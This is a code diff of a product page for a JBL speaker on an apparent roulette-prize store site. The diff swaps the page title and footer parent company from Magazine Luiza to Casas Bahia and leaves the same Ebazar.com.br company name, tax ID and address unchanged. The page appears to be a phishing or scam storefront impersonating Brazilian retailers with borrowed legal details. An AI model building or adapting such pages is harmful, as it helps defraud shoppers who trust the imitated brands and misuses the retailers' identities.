--- a/roleta/loja/jbl710/index.html
+++ b/roleta/loja/jbl710/index.html
@@ -49,7 +49,7 @@
 <link rel="stylesheet" href="css/fonts.css">
 <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@24,400,1,0">
 <link rel="icon" href="images_1">
-<link rel="shortcut icon" href="images_1">      <title>Magazine Luiza</title>
+<link rel="shortcut icon" href="images_1">      <title>Casas Bahia</title>
 <script src="js/latest_1.js" async="" defer=""></script>
    </head>
    <body>
@@ -192,7 +192,7 @@
          </div>
       </div>
       <div class="divisoria"></div>
-      <p style="margin-left: 3%; margin-right: 3%; font-family: 'GellixRegular'; font-size: 14px; padding-top: 5px;"><span style="font-family: 'GellixSemiBold';">Termos e condições. Como cuidamos da sua privacidade. Acessibilidade Informações sobre seguros Blog Afiliados Tendências</span><br><br>© 1999-2024 Ebazar.com.br LTDA.CNPJ n.º 03.007.331/0001-41 / Av. das Nações Unidas, nº 3.003, Bonfim, Osasco/SP - CEP 06233-903 - empresa do grupo Magazine Luiza.<span style="font-family: 'GellixSemiBold';"><br><br>Brasil/Português</span></p>
+      <p style="margin-left: 3%; margin-right: 3%; font-family: 'GellixRegular'; font-size: 14px; padding-top: 5px;"><span style="font-family: 'GellixSemiBold';">Termos e condições. Como cuidamos da sua privacidade. Acessibilidade Informações sobre seguros Blog Afiliados Tendências</span><br><br>© 1999-2024 Ebazar.com.br LTDA.CNPJ n.º 03.007.331/0001-41 / Av. das Nações Unidas, nº 3.003, Bonfim, Osasco/SP - CEP 06233-903 - empresa do grupo Casas Bahia.<span style="font-family: 'GellixSemiBold';"><br><br>Brasil/Português</span></p>
       <script src="responda.html"></script>
       <script>
          document.querySelectorAll('.thumbnails img').forEach(image => {
